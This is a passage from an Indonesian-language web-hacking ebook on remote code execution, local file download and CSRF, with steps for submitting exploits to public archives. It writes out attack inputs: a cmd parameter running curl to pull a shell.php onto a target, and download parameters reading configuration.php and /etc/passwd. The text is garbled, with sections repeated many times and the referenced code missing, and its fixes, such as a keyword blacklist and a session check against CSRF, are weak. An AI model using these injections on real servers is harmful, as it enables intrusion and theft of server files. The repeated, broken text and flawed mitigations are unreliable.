Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
